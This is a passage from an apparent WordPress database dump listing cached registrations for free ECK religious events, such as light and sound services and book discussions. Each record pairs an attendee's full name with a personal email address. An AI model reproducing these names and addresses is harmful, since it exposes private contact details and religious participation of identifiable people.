Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438134,'UWY19613_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438135,'PKC99995_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438136,'KLR12655_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438137,'VQY60201_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438138,'UGM28529_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:12:\"Test Message\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438139,'FNV15669_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438140,'CZA82590_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438141,'GOV55106_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"alaffertyhu@gmail.com\";s:4:\"name\";s:13:\"Anna Lafferty\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438142,'VZC41276_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:9:\"ELSS Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438143,'HDF28140_cached','a:1:{i:0;a:24:{s:5:\"email\";s:17:\"stuart@olypen.com\";s:4:\"name\";s:12:\"Linda Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438144,'CFQ67977_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"laurahbrockyoung@gmail.com\";s:4:\"name\";s:18:\"Laurah Brock young\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438145,'DGX64933_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438146,'GNP44203_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"stoneycole78@gmail.com\";s:4:\"name\";s:11:\"Sarah Cole \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438147,'PTA53516_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"p_b_reeves@msn.com\";s:4:\"name\";s:14:\"Patrick Reeves\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1657449000:1657495800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1657449000;s:20:\"ticket_timestamp_end\";i:1657495800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438148,'NZS19398_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:4:\"Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1656844200:1656891000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1656844200;s:20:\"ticket_timestamp_end\";i:1656891000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438149,'MEX17710_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santaigo\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1656844200:1656891000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1656844200;s:20:\"ticket_timestamp_end\";i:1656891000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438150,'PBG26291_cached','a:1:{i:0;a:24:{s:5:\"email\";s:15:\"crushold@me.com\";s:4:\"name\";s:13:\"Candy Rushold\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655838000:1655841600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655838000;s:20:\"ticket_timestamp_end\";i:1655843400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438151,'JBU21686_cached','a:1:{i:0;a:24:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655838000:1655841600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655838000;s:20:\"ticket_timestamp_end\";i:1655843400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438152,'QLR29831_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"blueseausa@yahoo.com\";s:4:\"name\";s:9:\"Iyke Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655639100:1655643600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655639100;s:20:\"ticket_timestamp_end\";i:1655643600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438153,'FYW24835_cached','a:1:{i:0;a:24:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655639100:1655643600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655639100;s:20:\"ticket_timestamp_end\";i:1655643600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438154,'OKA60338_cached','a:1:{i:0;a:24:{s:5:\"email\";s:25:\"marilynmillarhu@gmail.com\";s:4:\"name\";s:14:\"Marilyn Millar\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655639100:1655643600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655639100;s:20:\"ticket_timestamp_end\";i:1655643600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438155,'AKM39050_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:10:\"Tom Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655029800:1655076600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655029800;s:20:\"ticket_timestamp_end\";i:1655076600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438156,'SRW45694_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"woodjohn185@gmail.com\";s:4:\"name\";s:9:\"John Wood\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655029800:1655076600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655029800;s:20:\"ticket_timestamp_end\";i:1655076600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438157,'LPQ47947_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655029800:1655076600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655029800;s:20:\"ticket_timestamp_end\";i:1655076600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438158,'DAO21292_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"edwardsgenesis21@gmail.com\";s:4:\"name\";s:14:\"Genesis Brown \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655029800:1655076600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655029800;s:20:\"ticket_timestamp_end\";i:1655076600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438159,'ZEO50148_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"264haddenh@gmail.com\";s:4:\"name\";s:15:\"Diane Haddenham\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1655029800:1655076600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1655029800;s:20:\"ticket_timestamp_end\";i:1655076600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438160,'MWP96909_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound 